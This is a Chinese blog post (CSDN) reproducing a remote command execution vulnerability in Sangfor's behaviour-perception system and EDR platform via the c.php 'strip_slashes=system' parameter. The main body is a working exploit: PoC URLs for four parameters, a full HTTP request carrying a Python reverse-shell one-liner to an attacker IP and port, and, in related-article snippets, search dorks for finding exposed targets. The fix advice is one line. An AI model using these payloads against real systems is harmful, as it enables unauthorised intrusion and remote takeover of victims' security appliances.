深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试

最新推荐文章于 2024-08-26 09:43:36 发布
最新推荐文章于 2024-08-26 09:43:36 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 信息安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118175454
版权

简介

深信服行为感知系统和终端检测响应平台EDR是深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。

漏洞影响

深信服EDR 3.2.16
深信服EDR 3.2.17
深信服EDR 3.2.19
深信服 行为感知系统

漏洞复现

登录界面

登录界面

c.php 远程命令执行漏洞 使用以下poc进行访问

/tool/log/c.php?strip_slashes=system&host=echo hello
/tool/log/c.php?strip_slashes=system&limit=echo hello
/tool/log/c.php?strip_slashes=system&path=echo hello
/tool/log/c.php?strip_slashes=system&row=echo hello
执行 echo hello

输入hello

可弹shell 例如使用python弹shell POC如下

POST /tool/log/c.php HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903
Content-Length: 256

strip_slashes=system&host=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ip”,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

修复建议

升级最新版本 限制c.php的访问

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 1138
深信服终端监测响应平台EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
【漏洞复现深信服科技EDR平台存在任意用户登录漏洞
失心少年
09-08 890
技术文章仅供参考,任何个人组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。fofa:title=“终端检测响应平台
深信服安全服务认证工程师(SCSA-S)系列课程——网络渗透测试基础
最新发布
qq_44373268的博客
08-26 1244
外网渗透:模拟对内部状态一无所知的外部攻击者的行为(包括对网络设备的远程攻击、口令管理安全性测试、防火墙规则试探与规避、Web及其他开放应用服务的安全性测试等),从外网对目标进行渗透测试。侵入系统获取机密信息,并将入侵的过程细节产生报告提供给用户,由此确定用户系统存在的安全威胁,并能提醒安全管理员完善安全策略,降低安全风险。内网渗透:模拟客户内部违规操作者的行为,在内网中对目标进行渗透测试
深信服安全服务认证(SCSA-S)学习笔记:第二章 渗透测试基础
a1501090877的博客
10-15 5409
深信服安全服务认证学习笔记
深信服行为感知命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 5114
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板部分文件导致命令执行。其实整个过程深信服EDR命令执行漏洞差不多。其实整个URLEDR差不多。
深信服edr终端漏洞
qq_40806924的博客
08-20 4568
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
深信服 EDR终端检测响应平台漏洞
qax
10-06 578
0x01 前言 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 提示:以下是本篇文章正文内容,下面案例可供参考 0x02 影响范围 fofa关键字搜索:title=”终端检测响应平台” 0x03 远...
深信服终端检测响应平台EDR主打胶片.pptx
08-23
深信服终端检测响应平台EDR】是针对现代企业终端安全所设计的一款解决方案,旨在应对日益严重的外部威胁,特别是针对下一代终端安全的挑战。在当前的网络安全环境中,勒索病毒其他高级威胁频繁出现,对政府、...
下一代终端安全平台-深信服终端检测响应EDR.pdf
09-10
该下一代终端安全平台-深信服终端检测响应EDR,旨在respond to the increasing external threats and traditional terminal security deficiencies,通过深信服技术积累人工智能检测引擎,实现了智能检测、灵动...
深信服终端检测响应平台EDR-价值主张
05-04
深信服终端检测响应平台EDR(Endpoint Detection and Response)是一款针对企业级用户的下一代终端安全解决方案,旨在解决传统终端安全面临的诸多挑战。随着外部威胁的日益增加,如勒索病毒的频繁爆发,对政府、医疗...
深信服PHP,深信服终端检测响应平台 EDR 代码审计
weixin_30089411的博客
03-19 2589
今年 HW 深信服EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析复现看看。基本配置信息网上地下流传的深信服EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享记录一下相关信息,然后面看到的朋友少走弯路。首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:用户名密码rootedr@sangfor安装完成默认是静态 IP,得配置...
深信服终端安全管理系统EDR用户手册-398
07-07
关键词:深信服终端安全管理系统 EDR、安全管理、终端安全、数据保护、恶意攻击、威胁检测、事件响应。 相关概念: * 终端安全管理:终端安全管理是指保护终端设备数据免受恶意攻击数据泄露的威胁的过程。 * ...
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 5002
终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
深信服EDR漏洞复现
黑白的博客
11-06 1854
声明 往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步 漏洞描述 据说是有人把源码放网上了,不过看了看源码审计的骨偶成,也确实利用php反序列化,从而RCE 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC
深信服 EDR终端检测响应平台 0day RCE 漏洞
xj28555的博客
08-18 976
0x01 介绍 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 Fofa关键字: title=“终端检测响应平台” 如图 0x02 RCE payload https://xxx.com:xxx/tool/log/c.p
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 1092
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件管理平台软件共同组成。2020年08月18日左右检测深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
某信服EDR终端检测响应平台RCE漏洞
cj_Hydra's Blog
08-18 5052
前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。 复现: 第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。 第二步:随缘点击进去一个来到主界面,也就是这个样子。 第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限 反弹shell。 ...
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 9253
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
深信服EDR任意用户登录
nnn2188185的博客
03-17 682
深信服终端监测响应平台EDR)存在任意用户登录漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以未授权访问该平台后台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值